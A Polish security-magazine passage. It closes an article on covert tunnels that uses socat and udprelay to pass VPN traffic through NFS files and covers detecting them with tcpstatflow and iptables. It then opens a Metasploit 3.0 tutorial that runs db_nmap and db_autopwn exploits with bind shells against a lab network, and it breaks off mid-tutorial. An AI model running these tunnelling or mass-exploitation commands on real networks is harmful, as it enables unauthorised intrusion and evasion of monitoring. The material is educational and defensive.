nvpn  na  komputerze  A.  Serwer  po-
winien  nasłuchiwać  na  porcie  TCP:
10000.

Aby zrealizować część numer 1

połączenia należy wydać komendę:

socat udp-listen:15000 tcp4:
192.168.64.100:10000

Spowoduje to powstanie dwukierun-
kowego kanału, który przekieruje
wszystkie pakiety UDP przychodzą-
ce na port 15000 do połączenia TCP
na port 10000.

Połączenie UDP-plik (numer 2)

realizuje komenda:

socat -u udp4-listen:10000,
reuseaddr open:/mnt/nfs_remote/hostA-
hostC,sync

Wszystkie pakiety UDP wysłane na
port 10000, zostaną zapisane do pli-
ku na dysku sieciowym. Przełącznik

Listing 3.

Tunel zestawiony pomiędzy komputerami A oraz B

hostb:~

# ping 10.4.0.1

PING 10.4.0.1 (10.4.0.1) 56(84) bytes of data.

64 bytes from 10.4.0.1:

icmp_seq

ttl

=64

time

=5147 ms

64 bytes from 10.4.0.1:

icmp_seq

ttl

=64

time

=10093 ms

64 bytes from 10.4.0.1:

icmp_seq

ttl

=64

time

=9092 ms

64 bytes from 10.4.0.1:

icmp_seq

ttl

=64

time

=8092 ms

64 bytes from 10.4.0.1:

icmp_seq

ttl

=64

time

=7092 ms

64 bytes from 10.4.0.1:

icmp_seq

ttl

=64

time

=24040 ms

64 bytes from 10.4.0.1:

icmp_seq

ttl

=64

time

=23038 ms

Listing 4.

Połączenie

debian:~

# ping 10.4.0.2

PING 10.4.0.2 (10.4.0.2) 56(84) bytes of data.

64 bytes from 10.4.0.2:

icmp_seq

ttl

=64

time

=8607 ms

64 bytes from 10.4.0.2:

icmp_seq

ttl

=64

time

=7607 ms

64 bytes from 10.4.0.2:

icmp_seq

ttl

=64

time

=6607 ms

64 bytes from 10.4.0.2:

icmp_seq

ttl

=64

time

=5607 ms

64 bytes from 10.4.0.2:

icmp_seq

ttl

=64

time

=4607 ms

64 bytes from 10.4.0.2:

icmp_seq

ttl

=64

time

=3607 ms

64 bytes from 10.4.0.2:

icmp_seq

ttl

=64

time

=5623 ms

64 bytes from 10.4.0.2:

icmp_seq

ttl

=64

time

=4620 ms

64 bytes from 10.4.0.2:

icmp_seq

ttl

=64

time

=3618 ms

64 bytes from 10.4.0.2:

icmp_seq

=10

ttl

=64

time

=2614 ms

--- 10.4.0.2 ping statistics ---

13 packets transmitted, 10 received, 23% packet loss, time 12024ms
rtt min/avg/max/mdev = 2614.549/5312.246/8607.296/1789.397 ms, pipe 9

Listing 5.

Rezultaty implementacji

vegard@gyversalen:~$ ping -i 900 10.0.3.1
PING 10.0.3.1 (10.0.3.1): 56 data bytes

64 bytes from 10.0.3.1:

icmp_seq

ttl

=255

time

=6165731.1 ms

64 bytes from 10.0.3.1:

icmp_seq

ttl

=255

time

=3211900.8 ms

64 bytes from 10.0.3.1:

icmp_seq

ttl

=255

time

=5124922.8 ms

Listing 6.

Rezultat na maszynie o adresie 192.168.128.100

debian:~

# hping2 192.168.198.200 -S -p 110

HPING 192.168.198.200 (eth0 192.168.198.200): S set, 40 headers + 0 data

bytes

len

=46

=192.168.198.200

ttl

=63 DF

sport

=110

flags

=SA

seq

win

=5840

rtt

=8.9 ms

len

=46

=192.168.198.200

ttl

=63 DF

sport

=110

flags

=SA

seq

win

=5840

rtt

=3.8 ms

len

=46

=192.168.198.200

ttl

=63 DF

sport

=110

flags

=SA

seq

win

=5840

rtt

=1.3 ms

len

=46

=192.168.198.200

ttl

=63 DF

sport

=110

flags

=SA

seq

win

=5840

rtt

=1.3 ms

len

=46

=192.168.198.200

ttl

=63 DF

sport

=110

flags

=SA

seq

win

=5840

rtt

=1.2 ms

len

=46

=192.168.198.200

ttl

=63 DF

sport

=110

flags

=SA

seq

=12

win

=5840

rtt

=2.8 ms

len

=46

=192.168.198.200

ttl

=63 DF

sport

=110

flags

=SA

seq

=24

win

=5840

rtt

=2.3 ms

len

=46

=192.168.198.200

ttl

=63 DF

sport

=110

flags

=SA

seq

=35

win

=5840

rtt

=2.6 ms

len

=46

=192.168.198.200

ttl

=63 DF

sport

=110

flags

=SA

seq

=46

win

=5840

rtt

=3.7 ms

hakin9 Nr 4/2007

www.hakin9.org

-u powoduje, że komunikacja gniaz-
do->plik jest jednokierunkowa. Do-
datkowy parametr sync zapewnia,
że zapisy do pliku nie będą buforo-
wane.

Dane przychodzące do kompute-

ra A z komputera C poprzez plik ho-
stC-hostA (połączenie nr 6) są prze-
kazywane za pomocą:

socat -u open:/mnt/nfs_remote/host4-
host1,
sync,ignoreeof udp:192.168.64.100:
15001,
sourceport=10001,reuseaddr

Dodatkowy parametr ignoreeof powo-
duje, że Socat zakłada iż plik rośnie i
ignoruje znacznik końca danych i pró-
buje odczytać więcej danych (działa-
nie podobne do polecenia tail -f). Da-
ne odczytywane z pliku są wysyłane
do  UDP:192.168.64.100:15001.  Ja-
ko port źródłowy ustawiona jest war-
tość  10001.  Pakiety  te  odbierane  są
przez  program  Udprelay.  Zadaniem
połączenia numer 6.5 jest odebranie
tych  pakietów  a  następnie  wysłanie
ich  do  UDP:192.168.60.100:15000,
używając  przy  okazji  portu  10000.
Połączenie to realizowane jest przez
polecenie:

udprelay -d -f /etc/udprelay.conf

Plik konfiguracyjny dla Udprelay po-
winien zawierać jedną linijkę:

relay 192.168.64.100 10001
15001 192.168.64.100 15000 10000 oneway

Nadaje ona działaniu Udprelay nastę-
pujące znaczenia: przekazuj pakiety w
jednym kierunku.; oczekuj pakietów z
adresu 192.168.64.100, portu docelo-
wego 15001 i portu źródłowego 10001;
przekaż dane do 192.168.64.100 uży-
wając portu docelowego 15000 i portu
źródłowego 10000.

Jak pamiętamy, na porcie 15000

nasłuchuje  Socat  realizujący  połą-
czenie  numer  1,  a  na  porcie  10000
Socat  obsługujący  połączenie  nu-
mer 2. Użycie Udprelay ma na celu
zmylenia Socat-a (1) tak aby po ode-
braniu pakietów od 6.5 odpowiedział
pakietami w kierunku (2).

Nadszedł czas na komputer C. Po-

łączenie nr 3 zrealizuje polecenie:

socat -u udp-listen:20000,reuseaddr
open:/mnt/nfs_remote/hostC-hostA,sync

Połączenie nr 4:

socat tcp4-listen:5000,reuseaddr udp:
192.168.128.100:20000,sourceport=25000

Połączenie nr 5:

socat -u open:/mnt/nfs_remote/hostA-
hostC,
sync,ignoreeof udp:192.168.128.100:
25001,
sourceport=20001

Połączenie nr 5.5:

udprelay -d -f /etc/udprelay.conf

Plik konfiguracyjny powinien zawie-
rać:

relay 192.168.128.100 20001
25001 192.168.128.100 25000 20000
oneway

Teraz prześledźmy, co się stanie, gdy
uruchomimy openvpn-a, który połączy
się do TCP:192.168.128.100:5000.

W tej sytuacji pakiet zostanie ode-

brany przez (4) i wysłany do (3) na port
UDP:20000. (3) zapisze dane do pli-
ku (hostC-hostA) na dysku sieciowym
NFS. Po pewnym czasie (6) zorientu-
je  się,  że  plik  się  powiększył,  odczy-
ta  go  i  prześle  do  (6.5),  który  wyśle
go  w  pakiecie  UDP:192.168.64.100:
15000  używając  portu  10000  do  (1).
(1)  przekaże  dane  do  serwera  Ope-
nvpn komputera A. Openvpn w odpo-
wiedzi wyśle dane do (1), który odpo-
wie w kierunku, z którego przyszły da-
ne – czyli (2). (2) zapisze dane do pli-
ku hostA-hostC. Plik ten jest monitoro-
wany przez (5), który zauważając da-
ne wyśle je do (5.5). Dane te w pakie-
cie UDP:192.168.128.100:25000 (port
źródłowy 20000) trafią do (4) i dalej z
powrotem do klienta openvpn. Voila...

Połączenie takie ma jeden man-

kament – co zobaczymy na Listin-
gu 4.

Rysunek 4.

Schemat komunikacji poprzez serwer NFS

Pakiety w tunelu

Komfort gry w Quake'a w dalszym

ciągu byłby zachwiany. Ponadto trud-
no nie wspomnieć o bezpieczeństwie
takiego tunelu, a raczej braku takiego
bezpieczeństwa. Cała komunikacja
zostaje bowiem utrwalona w dwóch
plikach zdalnego katalogu.

IP w czymkolwiek

Techniki  tunelowania  za  pomocą
protokołu  HTTP  oraz  ICMP  zosta-
ły  opisane  w  Hakin9u  nr  2/2007,  w
związku  z  tym  niniejszy  artykuł  po-
minie te protokoły. Zainteresowanym
czytelnikom polecam lekturę tego ar-
tykułu oraz dokumentacje do [11] [12]
[13] jako uzupełnienie.

Jednym z ciekawszych pomy-

słów,  aczkolwiek  dość  trudnym  w
realizacji,  jest  użycie  papieru  ja-
ko  medium  transmisyjnego  i  wy-
korzystanie  gołębi  pocztowych  do
przekazywania pakietów z jednego
miejsca  w  inne.  Pomysł  ten  został
opisany w dokumencie RFC numer
1149. Pierwsze próby implementa-
cji  podobno  przyniosły  dość  obie-
cujące rezultaty, co zobaczymy na
Listingu 5.

W tym przypadku należy defi-

nitywnie stwierdzić. Używając ta-
kiego tunelu nie da się grać w Qu-
ake'a.

Paradygmat

– „szukaj i niszcz”

Istnieje  stosunkowo  niewiele  narzę-
dzi  do  wyszukiwania  ukrytych  kana-
łów. Być może spowodowane jest to
tym, że de facto nie wiadomo czego
należy  szukać.  Jednym  z  lepszych
(a  zarazem  sprawdzonych)  narzę-
dzi  jest  snort_inline  opisany  w  Haki-
n9u 1/2007. Należy mieć na uwadze
fakt, że wykrywanie tuneli sprowadza
się w większości przypadków do ana-
lizy statystycznej płynącego przez ro-
uter  ruchu  i  wykrywania  wszelkiego
rodzaju  anomalii.  Dlatego  odpowied-
nia  konfiguracja  systemu  IDS  jest  w
stanie wykryć ukryty tunel. Dla proto-
kołu TCP zostało napisane narzędzie
o nazwie Tcpstatflow [15]. Jego zada-
niem jest analiza ruchu i alarmowanie
w momencie przekroczenia progu pa-
rametru ruchu takiego, jak czas trwa-
nia  komunikacji,  liczba  bajtów  przy-
chodzących,  ilość  pakietów  przycho-
dzących. Na przykład, aby wykryć se-
sje HTTPS, które trwają ponad 60 se-
kund, wystarczy wydać polecenie:

debian:~# ./tcpstatflow -y 60 port 443.
/tcpstatflow[5771]: listening on eth0

Gdy taka sesja zostanie wykryta pro-
gram wyświetli komunikat:

Potencial tunnel = 192.168.198.128:
3863->
192.168.198.200:443: packets rx=82
tx=86,
bytes rx=9080 tx=1983, seconds=61

Nie jest to jedyne narzędzie, za po-
mocą  którego  można  badać  ruch
przechodzący przez router. Pozosta-
łe  narzędzia,  których  pokaźna  lista
znajduje  się  w  [14],  skoncentrowa-
ne  są  raczej  na  prowadzeniu  staty-
styk połączeń, portów etc., lub poka-
zywaniu bieżącej działalności w ka-

blu.  Przykładem  może  być  chociaż-
by  jnettop,  czy  popularny  iptraf.  Za
pomocą  obu  tych  narzędzi  admini-
strator jest w stanie zobaczyć, jakie
połączenia  utrzymują  użytkownicy  i
podjąć odpowiednie kroki.

Z perspektywy administrato-

ra  można  też  podejść  do  proble-
mu  od  drugiej  strony,  a  mianowicie
skoncentrować się nie na wykrywa-
niu i usuwaniu tuneli kopanych przez
użytkowników, ale na podjęciu pew-
nych  kroków  prewencyjnych,  które
utrudnią lub całkowicie uniemożliwią
stworzenie  ukrytego  kanału.  Wie-
dząc, jak działają tunele, łatwo prze-
ciwdziałać  ich  powstawaniu.  Można
przykładowo  na  maszynie  firewal-
la  zainstalować  proxy  ICMP,  które

hakin9 Nr 4/2007

www.hakin9.org

będzie  pośredniczyło  w  wymianie
tych pakietów pomiędzy siecią lokal-
ną, a Internetem. Dzięki takiej funk-
cji moduł mod_icmp [15] skutecznie
uniemożliwi  tworzenie  tuneli  opar-
tych  o  ten  protokół  (chyba  że  ktoś
wykorzysta  ten  protokół  do  stwo-
rzenia  ukrytego  kanału  wykorzystu-
jącego  odstępy  czasu  do  przeka-
zania  informacji  [16]).  Kolejną  rze-
czą, którą może zrobić administrator,
jest  ograniczenie  liczby  prób  komu-
nikacji przez niektóre usługi. Opisa-
ny w artykule Mailtunnel łatwo moż-
na unieszkodliwić nakładając ograni-
czenia na liczbę prób nawiązania po-
łączenia na porty 25 i 110.

Można to osiągnąć wykorzystu-

jąc standardowe moduły Iptables.
Na początku blokujemy wszystkie
połączenia wychodzące na interesu-
jące nas porty:

iptables -I FORWARD -s 192.168.128.100
-p tcp -m multiport --destination-port
25,110 --syn -j DROP

następnie zezwalamy na określoną
liczbę pakietów syn/minutę dla połą-
czeń na odpowiednie porty:

iptables -I FORWARD -s 192.168.128.100
-p tcp --dport 110 -m limit --limit
5/min --syn -j ACCEPT
iptables -I FORWARD -s 192.168.128.100
-p tcp --dport 25 -m limit --limit
10/min --syn -j ACCEPT

Teraz możemy zaobserwować ocze-
kiwany rezultat na maszynie o adre-
sie 192.168.128.100 – Listing 6.

Jak widać pierwszych 5 pakie-

tów zostało przepuszczonych. Spo-
wodowane jest to domyślną warto-
ścią  limit-burst  modułu  limit  w  Ip-
tables,  która  jest  ustawiona  na  5.
Następnie  pakiety  TCP  z  ustawio-
ną  flagą  SYN  są  przepuszczane  z
prędkością 1 na 1/5 min. Dzięki ta-
kiemu  zabiegowi  znacznie  trudniej
będzie stworzyć tunel oparty o pro-
tokoły  SMTP  oraz  POP.  Podobny
zabieg  można    zastosować  wobec
innych protokołów.

Kolejną rzeczą, którą admini-

strator powinien rozważyć, jest uru-
chomienie transparentnego serwe-

ra proxy, który przechwytywałby żą-
dania użytkowników. Na taki serwer
można  nałożyć  dodatkowe  ograni-
czenia, które uniemożliwią tworzenie
niektórych  rodzajów  tunelów  opar-
tych  o  HTTP.  Stosowanie  tego  roz-
wiązania posiada dodatkową zaletę,
a  mianowicie  serwer  proxy  odciąży
trochę nasze łącze, ponieważ część
danych będzie znajdować się w ca-
che serwera.

Jeżeli kopanie tuneli jest w sieci

zabronione  ze  względu  na  duże  zu-
życie  zasobów  przez  programy  p2p,
to panaceum na wszystkie problemy
może  się  okazać  sprawiedliwy  po-
dział  łącza  [16].  Użytkownicy,  którzy
wykopali sobie tunel i wykorzystują go
do ściągania darmowego i legalnego

oprogramowania po prostu wykorzy-
stają całe przydzielone im pasmo.

To nie koniec

Przedstawione  w  artykule  pomy-
sły nie są wszystkimi, jakie można
zrealizować.  Użytkownicy,  chcąc
obejść  zabezpieczenia  admini-
stratora,  wymyślają  coraz  to  now-
sze  sposoby  na  pokonanie  narzu-
conych  im  ograniczeń.  W  odpo-
wiedzi  administratorzy  stosują  co-
raz bardziej wymyślne techniki wy-
krywania  i  unieszkodliwiania  tune-
li.  Z  pewnością  nie  można  powie-
dzieć,  że  widać  koniec  tej  wojny.
Wręcz  przeciwnie,  można  odnieść
wrażenie, że jest to dopiero jej po-
czątek. l

O autorze

Konrad Malewski, absolwent informatyki Politechniki Śląskiej. Obecnie doktorant in-
formatyki na AGH. Administrator amatorskich sieci komputerowych. Zarówno w pracy,
jak i w życiu prywatnym interesuje się programowaniem oraz bezpieczeństwem apli-
kacji sieciowych.
Kontakt z autorem: kamalewski@gmail.com

W Sieci

• http://linux-igd.sourceforge.net/ - Tutaj znajdziemy demona IGD pod Linux.
• http://pupnp.sourceforge.net/ - Biblioteka oraz SDK, potrzebne do uruchomienia

IGD.

• http://miniupnp.free.fr/ - Klient IGD, za pomocą którego możemy konfigurować

przekierowania.

• http://www.upnp.org/download/UPnPDA10_20000613.html – Dokument opisują-

cy szczegółowo architekturę UPnP

• http://www.hamachi.cc/ - Strona producenta programu Hamachi wykorzystywa-

nego do tworzenia tuneli na potrzeby gier.

• http://www.detached.net/mailtunnel.html - Program służący do tunelowania połą-

czeń TCP w przesyłkach email.

• http://home.agh.edu.pl/~koyot/mailtunnel/mailtunnel-0.3.tar.gz - zmodyfikowana

na potrzeby stworzenia VPN-a wersja programu Mailtunnel

• http://gray-world.net/tools/ftp-tunnel.tgz – program do tunelowania za pomocą FTP.
• http://www.dest-unreach.org/socat/ - program przekazujący dane pomiędzy róż-

nymi źródłami.

• ftp://sunsite.unc.edu/pub/Linux/system/network/misc/udprelay-linux.tgz – UDP

bouncer

•  http://sourceforge.net/projects/proxytunnel/
•  http://www.nocrew.org/software/httptunnel.html
•  http://gray-world.net/tools/icmptunnel.tar.gz
•  http://www.slac.stanford.edu/xorg/nmtf/nmtf-tools.html  –  Lista  narzędzi  służą-

cych do monitorowania sieci i nie tylko

• http://www.geocities.com/fryxar/
• http://www.multicians.org/timing-chn.html – Ukryte kanały, które wykorzystują

zdarzenia czasowe do przekazania informacji.

• http://sp9wun.republika.pl/linux/shaperd_cbq.html – Strona domowa demona, za

pomocą którego ustawimy „sprawiedliwy podział łącza”

To portal wydawnictwa CSH Na tej stronie moż-

na znaleźć garść potrzebnych informacji: aktu-

alności ze świata informatycznego, jest także

możliwość pobrania filmu szkoleniowego.

http://www.szkolahakerow.pl

Portal poświęcony aktualnościom, artykułom ze

świata informatycznego. Zawiera ciekawe linki,

gry on-line i wiele innych interesujących wiado-

mości.

http://www.hackme.pl

Portal poświęcony aktualnościom, artykułom

ze świata informatycznego. Zawiera ciekawe

linki, gry on-line i wiele innych interesujących

wiadomości.

http://www.linuxstorm.org

Strona zawiera ogłoszenia pracy na stanowi-

ska związane z branżą IT

http://www.pracait.com

Misją Infoprof jest zrozumienie potrzeb klienta

i taki dobór usług by jak najlepiej spełniały one

jego oczekiwania, jednocześnie nie narażając

go na niepotrzebne koszty..

http://www.infoprof.pl

Strona firmy komputerowej, która dostarcza

profesjonalne rozwiązania informatyczne, któ-

re polegaja na kompleksowym dostarczaniu

doradztwa, usług i sprzętu komputerowego.

http://www.dkmgroup.pl

Serwis informacyjny, na którym znajdują się

najświeższe aktualności i artykuły, można za-

logować się na forum i podyskutować z cie-

kawymi osobami na interesujące tematy.

http//www.cc-team.org

Misją serwisu jest dostarczanie informacji z za-

kresu szeroko pojętej informatyki. Zawiera naj-

świeższe informacje z rynku informatycznego i

recenzje czasopism: Hakin9, php solution, sdj

http://www.itnews.icx.pl

Grupa młodych ludzi chętnych do pracy stwo-

rzyła ten portal w celu rozreklamowania się. Ich

firma zajmuję się kompleksową usługą związa-

ną z promowaniem stron WWW.

http://www.webgroup.net.pl

Strony

polecane >>>

Strony

polecane

Portal poświęcony zdalnym rozwiązaniom IT,

świadczone usługi są dyskretne i dokładne.

http://www.xesit.pl

Portal zajmującymi się następującymi usługa-

mi:instalacja, serwis i administrowanie siecia-

mi komputerowymi.Budowa serwerów, likwida-

cja wirusów, spyweru, trojanów itp

http://www.mikroserwis.webpark.pl

ArComTech to firma informatyczna wspierają-

ca rozwój przedsiębiorstw poprzez umiejętne

zastosowanie wiedzy i doświadczenia oraz no-

woczesnych rozwiązań biznesowych

http//www.arcomtech.pl

www.hakin9.org

hakin9 Nr 4/2007

Obrona

rzed kilkoma miesiącami pokazała się
nowa beta wersja Metasploit 3.0. Wer-
sja 3.0 znacznie różni się od wersji po-

przedniej,  przede  wszystkim  całość  przepisa-
na została do języka programowania Ruby. Po-
wodów,  dla  których  autorzy  tak  uczynili  jest
więcej: niezależność od architektury systemu,
wspieranie threadingu (włókien), a także to, że
autorzy Metasploit mają opanowany język pro-
gramowania Ruby i dobrze im się z nim pracu-
je. Dla nas użytkowników jednak ten fakt nicze-
go  nie  zmienia  i  Metasploit  pozostaje  przede
wszystkim  narzędziem  dla  oceny  podatności
systemów na włamanie.

Jak podane zostało na stronie głównej pro-

jektu, głównymi celami wersji 3.0 są:

● usprawnienie automatyzacji exploitowania

za pomocą skryptów,

● uproszczenie procesu tworzenia własnych

exploitów,

● umożliwienie ponownego użycia kodu z in-

nych exploitów,

● zaprowadzenie nowych technik exploitowa-

nia i ulepszanie technik już istniejących,

● umożliwienie automatycznego wyszukiwania

w sieci przy użyciu dodatkowego modułu,

● udoskanalanie środowiska rozwoju tak,

aby było dla użytkownika jeszce bardziej
przyjazne.

Najlepszą  inowacją  zastosowaną  w  nowej
wersji  jest  możliwość  automatycznego  prze-
szukiwania  sieci  za  pomocą  zabudowanych
modułów.  Oznacza  to,  że  w  celu  przeszu-
kiwania  sieci  możemy  użyć  urządzeń  nmap
(ze  wszystkimi  znanymi  przełącznikami),  za-
pisać wyniki w bazie danych, a potem szukać
dziur  w  systemach  i  usługach,  które  zyskali-

Metasploit – Exploiting

framework

Michal Merta

stopień trudności

Chcesz wiedzieć czy twój system jest dostatecznie zabezpieczony?

Chcesz się nauczyć używania prostego narzędzia, by to stwierdzić?

Chciałbyś tworzyć swoje własne exploity w prostym środowisku

rozwoju? Chcesz zaoszczędzić na produktach komercyjnych i użyć

tych pieniędzy w bardziej odpowiedni sposób? Jeśli tak, to ten

artykuł jest przeznaczony dla ciebie.

Czego się nauczysz...

•   na czym polega exploiting,
•   jak używać  Metasploit,
•   jak exploitować daną usługę za pomocą Meta-

sploit.

Co powinieneś wiedzieć...

• protokoły TCP/IP,
• podstawy pracy z bazą danych i językiem pro-

gramowania SQL,

• Linux i jego środowisko.

Metasploit – Exploiting framework

hakin9 Nr 4/2007

www.hakin9.org

śmy podczas przeszukiwania sieci
(praktyczny przykład podany zosta-
nie poniżej).

Jak zaistalować i uruchomić

Metasploit  (choćby  tylko  dlate-
go, że proces instalacji jest w każ-
dym systemie inny), nie trzeba tłu-
maczyć.  W  każdym  razie  trzeba
mieć  zainstalowany  pakiet  Ruby-

Gems,  Ruby  sterownik  umożliwia-
jący pracę z bazą danych oraz ba-
zę  danych.  Poniżej  podane  zosta-
ły wyjścia wygenerowane na kom-
puterze,  który  pracuje  pod  syste-
mem operacyjnym Linux, dystrybu-
cją Gentoo z jądrem 2.6.15 i na ba-
zie danych PostgreSQL.

Zanim rozpoczniemy pracę z Me-

tasploitem, wskazana jest aktualiza-
cja programu i wszystkich jego czę-
ści  składowych  łącznie  z  modułami
na  wersję  najnowszą  –  Metasploit
oferuje  nam  możliwość  użycia  sub-

version klienta – więcej informacji
szukaj na stronach Metasploit.

Na początek polecam uruchomić

msfconsole i spróbować zorientować
się w środowisku Metasploit oraz w
jego poleceniach:

msf > load db_postgres
[*] Successfully loaded plugin:
db_postgres
msf >

Za pomocą polecenia load db_post-

gres nagramy wsparcie dla Postgre-
SQL do Metasploit i zostaną nam
ujawnione następne polecenia, któ-
rych można użyć.

Polecenie db_nmap -sS -P0 -O

10.0.0.0/24 umożliwi nam za pomocą
ICMP pingów zmapować lokalną sieć
z powłoką 24 przy użyciu półotwartych
połączeń  (half  open  SYN  scan)  bez
sprawdzania trwałości urządzeń. God-
nym uwagi jest to, że  db_nmap działa
praktycznie tak samo jak nmap – tak,
można używać wszystkich przełączni-
ków nmapa tak jak zawsze, wyniki ma-
powania (maszyny, uruchomione usłu-
gi) zostaną zapisane w bazie danych.
Polecenia  db_hosts i db_services po-
każą wyniki mapowania (otwarte porty
i znalezione stacje).

Listing 1.

Struktura bazy

danych PostgreSQL

localhost

# \dt

List

relations

Schema

Name

Type

Owner

--------+--------------+-------+--

--------

public

hosts

table

postgres

public

refs

table

postgres

public

services

table

postgres

public

vulns

table

postgres

public

vulns_refs

table

postgres

(

rows

)

localhost

# select * from hosts;

address

comm

name

state

info

----+------------+------+------+--

----------+----

10.0

0.1

unknown

10.0

0.46

unknown

10.0

0.2

unknown

10.0

0.200

unknown

(

rows

)

localhost

Listing 2.

Wyjścia poleceń db_hosts i db_services

msf

db_hosts

[*]

Host

10.0

0.1

[*]

Host

10.0

0.46

[*]

Host

10.0

0.2

[*]

Host

10.0

0.200

msf

db_services

[*]

Service

host

10.0

0.1

port

135

proto

tcp

state

name

msrpc

[*]

Service

host

10.0

0.1

port

139

proto

tcp

state

name

netbios

ssn

[*]

Service

host

10.0

0.1

port

445

proto

tcp

state

name

microsoft

[*]

Service

host

10.0

0.1

port

902

proto

tcp

state

name

iss

realsecure

sensor

[*]

Service

host

10.0

0.1

port

proto

tcp

state

name

http

[*]

Service

host

10.0

0.1

port

443

proto

tcp

state

name

https

[*]

Service

host

10.0

0.2

port

proto

tcp

state

name

ftp

[*]

Service

host

10.0

0.2

port

proto

tcp

state

name

ssh

[*]

Service

host

10.0

0.2

port

proto

tcp

state

name

smtp

[*]

Service

host

10.0

0.2

port

proto

tcp

state

name

http

[*]

Service

host

10.0

0.2

port

139

proto

tcp

state

name

netbios

ssn

[*]

Service

host

10.0

0.2

port

445

proto

tcp

state

name

microsoft

[*]

Service

host

10.0

0.46

port

135

proto

tcp

state

name

msrpc

[*]

Service

host

10.0

0.46

port

139

proto

tcp

state

name

netbios

ssn

[*]

Service

host

10.0

0.46

port

445

proto

tcp

state

name

microsoft

[*]

Service

host

10.0

0.46

port

1025

proto

tcp

state

name

NFS

IIS

[*]

Service

host

10.0

0.46

port

5000

proto

tcp

state

name

UPnP

[*]

Service

host

10.0

0.200

port

proto

tcp

state

name

http

[*]

Service

host

10.0

0.200

port

8080

proto

tcp

state

name

http

proxy

msf

Rysunek 1.

Expolit

hakin9 Nr 4/2007

www.hakin9.org

Obrona

Pomyślnie zapełniliśmy bazę da-

nych, teraz możemy rozpocząć wła-
ściwy proces exploitowania.

Exploiting

Zanim  jednak  rozpoczniemy,  trzeba
dobrze  przemyśleć  czy  exploitowa-
nie nie przyniesie nam więcej szko-
dy  niż  pożytku.  Nigdy  nie  podejmuj
się  exploitowania  czegoś,  do  czego
nie masz uprawnień!

Terminologia

Podatnośc  systemu  na  włamanie  to
zbiór  jego  luk  w  zabezpieczeniu  (na
przykład  konkretne  aplikacje  –  więk-
szością chodzi o błąd w naprogramo-
waniu),  przy  czym  przy  użyciu  odpo-
wiednich  technik  czy  narzędzi  włamy-
wacz potrafi naprzykład wprawić w sys-
tem  kawał  złośliwego  kodu,  odczyty-
wać czy zmieniać dane w systemie, ob-
serwować ruch w sieci itp.

Exploit to kawałek kodu (software)

albo zestaw poleceń wykorzystujący
luki w zabezpieczeniu systemu, inaczej
powiedziawszy jest to aplikacja wytwo-
rzona w celu uzyskania kontroli nad da-
nym systemem czy w celu spowodowa-
nia niedostępności usługi dla okolicy
(tzw. denial of service).

Ocena podatności systemu na

włamanie  to  proces  odnajdywania
najsłabszych miejsc w zabezpiecze-
niu danego systemu i następne oce-
nianie  ich  powagi.  Systemem  pod-
danym  badaniom  może  być  naprzy-
kład  budowla  (elektrownia  jądrowa),
wodociąg,  serwer  czy  sieć  kompu-
terowa.

Testem penetracyjnym nazywamy

metodę oceny zabezpieczenia kompu-
tera czy sieci komputerowej przy uży-
ciu w tym celu sposobów, których uży-
wał by włamywacz. Składa się z więk-
szej ilości kroków – od dokładnego ba-
dania  systemu  aż  po  odnalezienie  je-
go  najsłabszego  miejsca.  Zadaniem
testera penetracyjnego jest stwierdze-
nie  możliwych  sposobów  zaatakowa-
nia systemu (wystarczy odnaleźć jeden
słaby punkt).

Ludzie często zamieniają pojęcia

exploit i podatność systemu na wła-
manie czy proces oceny podatności na
włamanie z testowaniem penetracyj-
nym. Upewnij się więc, że te pojęcia ro-
zumiesz, dla zrozumienia następujące-
go tekstu jest to niezbędne.

Listing 3.

Użycie polecenia db_autopwn

msf

db_autopwn

[*]

Usage

db_autopwn

[

options

]

Show

all

matching

exploit

modules

Select

modules

based

vulnerability

references

Select

modules

based

open

ports

Launch

exploits

against

all

matched

targets

Only

obtain

single

shell

per

target

system

Use

reverse

connect

shell

Use

bind

shell

random

port

Display

this

help

text

Listing 4a.

Właściwy proces exploitowania

msf

db_autopwn

[*]

Analysis

completed

1.20325303077698

seconds

(

vulns

refs

)

[*]

Matched

exploit

windows

smb

ms04_031_netdde

against

10.0

0.46

135

...

[*]

Launching

exploit

windows

smb

ms04_031_netdde

(

)

against

10.0

0.46

135

...

[*]

Started

bind

handler

[*]

Matched

exploit

windows

smb

ms04_007_killbill

against

10.0

0.46

445

...

[*]

Matched

exploit

osx

samba

trans2open

against

10.0

0.46

139

...

[*]

Matched

exploit

windows

smb

ms06_025_rasmans_reg

against

10.0

0.46

445

...

[*]

Matched

auxiliary

dos

windows

smb

rras_vls_null_deref

against

10.0

0.46

445

...

[*]

Matched

exploit

windows

smb

ms06_025_rras

against

10.0

0.46

445

...

[*]

Matched

exploit

windows

smb

ms06_066_nwapi

against

10.0

0.46

445

...

[*]

Launching

exploit

windows

smb

ms06_066_nwapi

(

)

against

10.0

0.46

445

...

[*]

Started

bind

handler

[*]

Connecting

the

SMB

service

...

[*]

Matched

exploit

windows

smb

ms06_040_netapi

against

10.0

0.46

445

...

[*]

Launching

exploit

windows

smb

ms06_040_netapi

(

)

against

10.0

0.46

445

...

[*]

Started

bind

handler

[*]

Matched

exploit

windows

smb

ms04_011_lsass

against

10.0

0.46

445

...

[*]

Launching

exploit

windows

smb

ms04_011_lsass

(

)

against

10.0

0.46

445

...

[*]

Started

bind

handler

[*]

Matched

exploit

windows

smb

ms06

066

_nwwks

against

10.0

0.46

445

...

[*]

Launching

exploit

windows

smb

ms06

066

_nwwks

(

)

against

10.0

0.46

445

...

[*]

Started

bind

handler

[*]

Connecting

the

SMB

service

...

[*]

Matched

exploit

windows

smb

ms05_039_pnp

against

10.0

0.46

445

...

[*]

Launching

exploit

windows

smb

ms05

039

_pnp

(

)

against

10.0

0.46

445

...

[*]

Binding

e67ab081

9844

3521

d32

834

f038001c0

1.0

ncacn_np

10.0

0.46

[

srvsvc

]

...

[*]

Started

bind

handler

Metasploit – Exploiting framework

hakin9 Nr 4/2007

www.hakin9.org

Polecenie db_autopwn jest naj-

ważniejsze w całym środowisku Me-
tasploit.  Potrafi  na  przykład  spraw-
dzić wszystkie maszyny, usługi w ba-
zie danych i na podstawie tych infor-
macji wytworzyć spis exploitów, któ-
re  mogłyby  efektywnie  wykorzystać
słabe  miejsca  w  systemie,  o  ile  ja-
kieś istnieją.

Uruchomieniem db_autopwn -p

-t -e rozpoczniemy proces exploito-
wania i zaczekamy na wyniki. Czas
trwania całego procesu jest zależny
od ilości maszyn i usług w bazie da-
nych – Listing 4.

Gotowe. Polecenie sessions po-

każe nam czy proces przebiegł po-
myślnie czy też nie. Kiedy bardziej
uważnie popatrzymy na wyjście po-
lecenia db_autopwn, możemy sam
ocenić pomyślność procesu.

Popatrzmy na Listing 5 - “udało

